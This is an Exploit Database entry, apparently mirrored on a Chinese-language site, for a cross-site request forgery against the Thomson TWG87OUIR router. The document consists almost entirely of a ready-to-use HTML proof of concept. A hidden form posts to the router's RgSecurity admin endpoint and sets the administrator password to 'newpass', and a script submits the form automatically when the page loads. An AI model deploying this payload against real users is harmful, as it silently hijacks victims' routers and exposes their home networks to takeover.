Thomson TWG87OUIR – POST Password Cross-Site Request Forgery

• Exploit Database
• 146 阅读

• 作者： nopesled
  日期： 2014-06-25
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/33866/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  #Author: nopesled #Date: 24/06/14 #Vulnerability: POST Password Reset CSRF #Tested on: Thomson TWG87OUIR (Hardware Version)   <html> <head> <title>Thomson TWG87OUIR CSRF</title> </head> <body> <form name="exploit" method="post" action="http://192.168.0.1/goform/RgSecurity"> <input type="hidden" name="HttpUserId" value="" /> <input type="hidden" name="Password" value="newpass" /> <input type="hidden" name="PasswordReEnter" value="newpass" /> <input type="hidden" name="RestoreFactoryNo" value-="0x00" /> </form> <script type="text/javascript"> document.exploit.submit(); </script> </body> </html>